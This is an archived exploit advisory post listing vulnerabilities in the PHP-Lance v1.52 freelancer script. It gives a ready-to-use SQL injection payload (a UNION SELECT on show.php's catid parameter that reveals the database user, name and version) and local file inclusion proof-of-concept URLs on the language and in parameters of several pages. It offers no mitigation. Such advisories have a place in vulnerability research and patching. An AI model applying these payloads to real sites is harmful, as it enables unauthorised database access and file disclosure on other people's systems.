|    |    |    | Today: 18-Nov-2019 |

More Vulnerable File at PHP-Lance v1.52

December 6, 2009 | Posted in ExploitAlert

[+] Vendor : BitmixSoft (http://www.bitmixsoft.com)
[+] Script Name : PHP-Lance v1.52
[+] Price : US $349.95
[+] Description : PHP-Lance, is a multilingual freelancer site with advanced customization option in the admin area. You can set all functions of the site such as: you can add as many languages as you want, change the site colors easily, set the transaction fee, manage sellers and buyers, etc.

[ SQL Injection ]


show.php?catid=-9999'+union+select+concat(user(),0x3a,database(),0x3a,version())/*


Found by Cyb3r-1sT at November 27, 2008

[ Local File Inclusion ]

PoC's:

- http:// 127.0.0.1 / [path] /show.php?catid=5&sch=yellow&language=[LFI]
- http:// 127.0.0.1 / [path] /show.php?catid=5&sch=yellow&language=[LFI]
- http:// 127.0.0.1 / [path] /advanced_search.php?in=[LFI]


Found by jetli007 at August 18, 2009

and now more Vulnerable File is From Don Tukulesto

- http://127.0.0.1/confirm.php?language=[LFI]

Taged in: lance, vulnerable